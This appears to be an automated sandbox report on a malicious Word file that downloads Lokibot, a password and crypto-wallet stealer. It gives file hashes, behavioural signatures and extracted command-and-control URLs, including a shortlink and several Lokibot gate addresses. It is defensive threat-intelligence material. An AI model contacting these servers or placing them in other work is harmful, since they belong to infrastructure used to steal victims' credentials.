new_order.doc.docx

General
Target

new_order.doc.docx

Size

10KB

Sample

210421-fkdn2c39d6

Score
10 /10
MD5

eb9b4decb03b5c81b5f4c0cc9dd5758f

SHA1

22ee73cf80deaf3122cc4e9fd45b062f71b4e2f4

SHA256

ce47c3f3359a2f2dd2de306544df0e10cf5cefebfccf8d556432918622487f25

SHA512

f3baddcc36936c75ae6efc335db1bc53d6c9827c840dc34e1a9afe58a2dc9c1c285089986f165a2b0451eb1fb9a18d18143ef3f2c29b04aaccfb297f04c173ad

Malware Config

Extracted

Rule Microsoft Office WebSettings Relationship
C2

http://bit.do/fQyhA

Extracted

Family lokibot
C2

http://amrp.tw/kayo/gate.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Targets
Target

new_order.doc.docx

MD5

eb9b4decb03b5c81b5f4c0cc9dd5758f

Filesize

10KB

Score
10 /10
SHA1

22ee73cf80deaf3122cc4e9fd45b062f71b4e2f4

SHA256

ce47c3f3359a2f2dd2de306544df0e10cf5cefebfccf8d556432918622487f25

SHA512

f3baddcc36936c75ae6efc335db1bc53d6c9827c840dc34e1a9afe58a2dc9c1c285089986f165a2b0451eb1fb9a18d18143ef3f2c29b04aaccfb297f04c173ad

Tags

Signatures

  • Lokibot

    Description

    Lokibot is a Password and CryptoCoin Wallet Stealer.

    Tags

  • Blocklisted process makes network request

  • Downloads MZ/PE file

  • Executes dropped EXE

  • Abuses OpenXML format to download file from external location

  • Loads dropped DLL

  • Uses the VBS compiler for execution

    TTPs

    Scripting
  • Suspicious use of SetThreadContext

Related Tasks

MITRE ATT&CK Matrix
Collection
    Command and Control
      Credential Access
        Defense Evasion
        Exfiltration
          Impact
            Initial Access
              Lateral Movement
                Persistence
                  Privilege Escalation
                    Tasks

                    static1

                    10/10

                    behavioral1

                    10/10

                    behavioral2

                    1/10